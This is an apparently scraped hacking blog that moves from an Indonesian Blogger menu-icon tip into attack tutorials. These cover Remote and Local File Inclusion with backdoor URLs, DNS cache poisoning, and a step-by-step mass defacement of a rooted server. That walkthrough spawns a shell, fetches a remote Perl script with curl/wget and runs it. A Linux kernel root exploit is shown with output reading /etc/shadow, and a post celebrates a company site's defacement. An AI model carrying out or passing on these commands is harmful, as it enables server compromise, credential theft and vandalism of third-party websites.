Oke jika sudah kalian bisa masuk ke Dashboard blog kalian, dan masuk kedalam menu Theme > Edite HTML

Jika sudah letakan code link CSS tadi dibawah Meta tag

Nah jika sudah selanjut nya kita klik Save Theme

Selanjut nya kita pergi ke menu Layout > Top Menu biasanya tiap Theme beda disini menu saya yaitu Top Menu (Navigasi).

Oke jika sudah selanjut nya kita masukan script class icon nya

<i class="icon code"> (NamaMenuKamu) </i>

Contoh :

<i class="fa fa-home"> Home </i>

Nah jika sudah Klik Save

Dan lihat Menu Navigasi Blog Kamu :p

So Tampilan menjadi lebih Gimana gitu, cukup mudah dan gratis tanpa harus menyewa jasa developer yang tidak cukup murah harganya alias mahal haha :p

Jika Masih kurang paham bisa lihat Video nya disini :
Link : https://youtu.be/kV2nbRbz-ws

Selamat Beraktifitas kembali

(Zaenal Arifin)

Remote File Inclusion (RFI) Tutorial

2018-07-12T06:49:00.003-07:00

Remote File Inclusion (RFI)

Hello Guys! In this article we will learn how to exploit a RFI vulnerability. I hope you have read my previous article on Local File Inclusion, if you haven’t please go and read that first.

Remote File Inclusion (RFI)

As the name states if the attacker can include a remote file to the victim web app, it is called a Remote File Inclusion Vulnerability (RFI). Take a look at this piece of code:

Code :
$incfile = $_REQUEST["file"]; include($incfile.".php");

As you can see in the first line, it extracts the file parameter value from the HTTP request made by the user, while the second line utilities this value to set the file name. If the input is not being sanitized properly it can be used to include malicious file from a remote server. Here’s a vulnerable JSP code,

Code :
<c:import url=”<=request.getParameter(“conf”)%>”>

Again, If the input is not sanitized properly it can be used to include a malicious file from a remote server. RFI is not a common vulnerability at all but it is very dangerous when exploited. Now you must be wondering how to exploit this vulnerability. Hold on, I will demonstrate it with a real life example. We have a URL here,

Example :
http://www.victim.com/file.php?view=http://docs.mysite.com/backdoor.php

Lets break things down

www.victim.com is the target website

file.php is a webpage with the parameter view=

For example if the user wants to view a document related to animals, the webpage file.php loads it via the view= parameter.

Take a close look at view= , if it was including local files like view=/files/animals.php we would have test for Local File Inclusion. But as we can see its including files from docs.example.com which is a different website, it means it loads files from other website which means it may include any malicious file too. Enough theory! So here’s the vulnerable parameter

Now I will try to load an image by submitting its URL like this

Example :
http://www.victim.com/file.php?view=https://javahaxor.org/backdoor.php

See? How easy is that? With a webshell you can take over their website or even the whole server.

Also Read : File Inclusion Attack

File Inclusion Attack (LFI/RFI)

2018-07-12T06:49:00.000-07:00

Local File Inclusion (LFI) and Remote File Inclusion (RFI)

Today’s article is about Local File Inclusion (LFI) and Remote File Inclusion (RFI).
If you have basic knowledge of SQL injection you probably know how we can inject our SQL queries into a vulnerable parameter.
We take advantage of vulnerable parameters in LFI and RFI too.

In SQL injection, we interact with the SQL database using SQL queries to retrieve sensitive data from the database. But in LFI/RFI we ask the webpage to open something for us, it could be a file or a webpage (a webpage is a file too) from another website.
Enough theory! Now lets see what the heck are LFI and RFI.

Local File Inclusion (LFI)

Take a look a this URL:

Example :
www.victim.com/open.php?view=/images/Haxor.jpg

The parameter in this case is view= and the value is /images/Haxor.jpg.

It means open.php is a webpage which loads different files (Haxor.jpg in this case) from the server. There can be many sensitive files on the server which can be accessed using open.php if the webpage is vulnerable to LFI.

You can open/execute any type of file (not folders) with LFI, which means you can read logs, configuration files and execute files if a webpage is vulnerable to Local File Inclusion. You can even hack into the server if the server admin is stupid enough to not configure things properly.

Remote File Inclusion (RFI)

What is the difference between Local File Inclusion and Remote File Inclusion?

Well both vulnerabilities can be used to open things but LFI is used to open files from the server where website is hosted (locally) while RFI is used to open files from another server (remotely).

We can easily host a malicious file on our server and use the RFI vulnerability to run it on the victim website.

Take a look at this URL:

Example :
www.victim.com/get.php?page=home

By looking at the above URL one would guess that the parameter page= is loading webpages.

It is opening home page, similarly it may open other pages from the website. But if the webpage (get.php) is not programmed properly then a hacker can replace home by his desired webpage like,

Example :
www.victim.com/get.php?page=www.mysite.org/backdoor.php

If everything goes well then get.php will try to open backdoor.php which will compromise the server (or something else, depends on what’s in it). It makes RFI a deadly vulnerability.

DNS Poisoning Attack

2018-07-12T06:48:00.000-07:00

Okay a little introduction in advance, what is DNS Poisoning ?
DNS spoofing, commonly referred to as DNS Cache Poisoning, is a form of computer security hacking where corrupt Domain Name System (DNS) data is inserted into the DNS resolver cache, causing the Name Server to return an incorrect record of results, eg. IP address. This results in traffic being routed to the attacker's computer (or other computer).

Overview of the domain name system

A domain name Server System translates human-readable domain names (such as suicide-db.com) into numeric IP addresses used to route communication between nodes. Usually if the server does not know the requested translation, it will ask another server, and the process continues recursively. To improve performance, the server typically will remember (cache) this translation for a certain period of time. This means that if it receives another request for the same translation, it can reply without needing to ask another server, until the cache expires.

When the DNS server receives a fake translation and saves it for performance optimization, it is considered toxic, and it supplies false data to the client. If the DNS server is poisoned, it may return an incorrect IP address, redirecting traffic to another computer (often an attacker).

Cache poisoning attacks

Normally, a networked computer uses a DNS server provided by an Internet service provider (ISP) or the computer user's organization. DNS servers are used in an organization's network to improve resolution response performance by caching previously obtained query results. Poisoning attacks on a single DNS server can affect the users serviced directly by the compromised server or those serviced indirectly by its downstream server(s) if applicable.

To perform a cache poisoning attack, the attacker exploits flaws in the DNS software. A server should correctly validate DNS responses to ensure that they are from an authoritative source (for example by using DNSSEC); otherwise the server might end up caching the incorrect entries locally and serve them to other users that make the same request.

This attack can be used to redirect users from a website to another site of the attacker's choosing. For example, an attacker spoofs the IP address DNS entries for a target website on a given DNS server and replaces them with the IP address of a server under their control. The attacker then creates files on the server under their control with names matching those on the target server. These files usually contain malicious content, such as computer worms or viruses. A user whose computer has referenced the poisoned DNS server gets tricked into accepting content coming from a non-authentic server and unknowingly downloads the malicious content. This technique can also be used for phishing attacks, where a fake version of a genuine website is created to gather personal details such as bank and credit/debit card details.

Variants

In the following variants, the entries for the server ns.suicide-db.com would be poisoned and redirected to the attacker's name server at IP address 127.0.0.1. These attacks assume that the name server for suicide-db.com is ns.suicide-db.com.

To accomplish the attacks, the attacker must force the target DNS server to make a request for a domain controlled by one of the attacker's nameservers.

Redirect the target domain's name server

The first variant of DNS cache poisoning involves redirecting the name server of the attacker's domain to the name server of the target domain, then assigning that name server an IP address specified by the attacker.

DNS server's request : what are the address records for subdomain.attacker.com?

Example :
subdomain.attacker.com. IN A

Attacker's response :
Answer: (no response) Authority section: attacker.com. 3600 IN NS ns.suicide-db.com. Additional section: ns.suicide-db.com. IN A 127.0.0.1

A vulnerable server would cache the additional A-record (IP address) for ns.target.example, allowing the attacker to resolve queries to the entire suicide-db.com domain.

Redirect the NS record to another target domain

The second variant of DNS cache poisoning involves redirecting the nameserver of another domain unrelated to the original request to an IP address specified by the attacker.[citation needed]

DNS server's request: what are the address records for subdomain.attacker.com?

Example :
subdomain.attacker.com. IN A

Attacker's response :
Answer: (no response) Authority section: target.example. 3600 IN NS ns.attacker.com. Additional section: ns.attacker.com. IN A 127.0.0.1

A vulnerable server would cache the unrelated authority information for target.example's NS-record (nameserver entry), allowing the attacker to resolve queries to the entire suicide-db.comdomain.

Mass Deface 1 Server Setelah Root

2018-07-12T06:47:00.000-07:00

Okay back again with me, this time I will give tutorial mass deface 1 server after rooting the server
Okay first we must have root access to the target server, if we can do backconnect first as usual, if you do not know how to backconnect you can see the tutorial here:

Read This :
BackConnect Tutorial

Okay if you already do backconnect next we as usual do shell spawing first by using command:

Command :
python -c 'import pty; pty.spawn("/bin/sh")'

If it is next we can login root user first with the command :

Command :
s-4h.1$ su s-4h.1$ su firefart [if you use user firefart dirty] and login with user root

if already entered into the root user next step you can enter into the root root first by typing commands :

Command :
root@serverattack/var/www/home:# cd /root so it goes into dir root server : root@serverattack:# dir root <

now for the next step if you are already in root dir, you typed command to call our mass deface file by typing command :

Command :
curl -o root.pl http://pastebin.com/raw/A12b82ar or wget http://pastebin.com/raw/A12b82ar -o root.pl

if it appears 200 OK status means the file has been uploaded in the target server, the next step we go to dir tmp by typing the command :

Command :
root@serverattack:# cd /tmp so it goes into dir tmp server : root@serverattack/tmp:# dir tmp <

if it's next we can upload the file again that is for now we will upload our deface page file with the command :

Command :
curl -o index.html http[s]://yourdefacepage.com/ or wget http[s]://yourdefacepage.com/ -o index.html

if the file is already uploaded our last step is to execute our mass deface file, we must go to root dir again to execute , if it's going to root dir, we type the command :

Command :
perl root.pl -mass /tmp/index.html

and wait until the execution process is complete, if it is finished you can see if the web is hit by deface and check how many web that is in 1 server, you can use tools reverse ip.

and see all the web that resides on one server that, yups web in 1 server it Pwnd. :p

PoC Video :

Thanks you :p

Writed by : (Zaenal Arifin)

Linux Kernel Exploit 2017

2018-07-12T06:46:00.002-07:00

Whats is Linux Kernel ?

The Linux kernel is an open-source monolithic Unix-like computer operating system kernel. The Linux family of operating systems is based on this kernel and deployed on both traditional computer systems such as personal computers and servers, usually in the form of Linux distributions,[9] and on various embedded devices such as routers, wireless access points, PBXes, set-top boxes, FTA receivers, smart TVs, PVRs, and NAS appliances. The Android operating system for tablet computers, smartphones, and smartwatches uses services provided by the Linux kernel to implement its functionality. While the adoption on desktop computers is low, Linux-based operating systems dominate nearly every other segment of computing, from mobile devices to mainframes. As of November 2017, all of the world's 500 most powerful supercomputers run Linux.

Proof of Concept :

Kernel Exploits is A bunch of proof-of-concept exploit for the Linux kernel.

Exploit Lists :

[+] CVE-2016-2384

This is a proof-of-concept exploit for the vulnerability in the usb-midi Linux kernel driver (CVE-2016-2384). Requires physical access to the machine.

[+] CVE-2017-6074

This is a proof-of-concept local root exploit for the vulnerability in the DCCP protocol implementation CVE-2017-6074. Includes a semireliable SMEP/SMAP bypass (the kernel might crash shorty after the exploit succeds).

A proof-of-concept local root exploit for CVE-2017-6074.
Includes a semireliable SMAP/SMEP bypass.
Tested on 4.4.0-62-generic #83-Ubuntu kernel.

Source: https://github.com/xairy
and use your brain to use.

Usage :

Command :
git clone https://github.com/xairy/kernel-exploits [CVE Number] Example: $ cd CVE-2017-6074 $ gcc poc.c -o pwnd $ chmod +x pwnd $ ./pwnd Processing ............... [.] namespace sandbox setup successfully [.] disabling SMEP & SMAP [.] scheduling 0xffffffff81064550(0x406e0) [.] waiting for the timer to execute [.] done [.] SMEP & SMAP should be off now [.] getting root [.] executing 0x402043 [.] done [.] should be root now [.] checking if we got root [+] got r00t ^_^ [!] don't kill the exploit binary, the kernel will crash # cat /etc/shadow // ... daemon::17149:0:99999:7::: bin::17149:0:99999:7::: sys::17149:0:99999:7::: sync::17149:0:99999:7::: games:*:17149:0:99999:7::: #EOF

Official Website Madza Venezuela Diretas

2018-07-12T06:45:00.001-07:00

SUICIDE-DB - Thursday, 12-07-2018. The new site Madza Mobile Venezuela hacked by Indonesian Hackers , those who call themselves Typical Idiot Security back in action, this time the official website of Madza Mobile Venezuela became the target, this hacker managed to exploit the official website Madza Venezuela located at http://mazda.com.ve/free.html, this hacker does not change the look of the front page but instead entrust a file called free.html
which contains the message :

hacked by typical idiot security <3

free prosox

whatever the motive of this attack but in the message can be concluded that they are friends or what I do not know, da in the message convey the message "free Prosox", yes who does not know the name of Prosox, he is a hacker from francis attack the popular site youtube month then

Here's how websites look after hacked:

Mazda Motor Corporation (マツダ株式会社 Matsuda Kabushiki-gaisha) (TYO: 7261) is a Japanese automotive company. The company was founded in 1920 and headquartered in Hiroshima, Japan. The company employs 39,364 workers on March 31, 2008. In 2007, Mazda produced 1.3 million cars worldwide. Much of that production (nearly 1 million) is produced at its plant in Japan, with the remainder at other plants around the world.

Until this news is revealed there has been no improvement from related sites. But the site is already being forwarded for archives or alerts that the site has been hacked.

You can see the Archive Mirror database of hackers at :
http://www.zone-h.org/mirror/id/31455443

(Zaenal Arifin)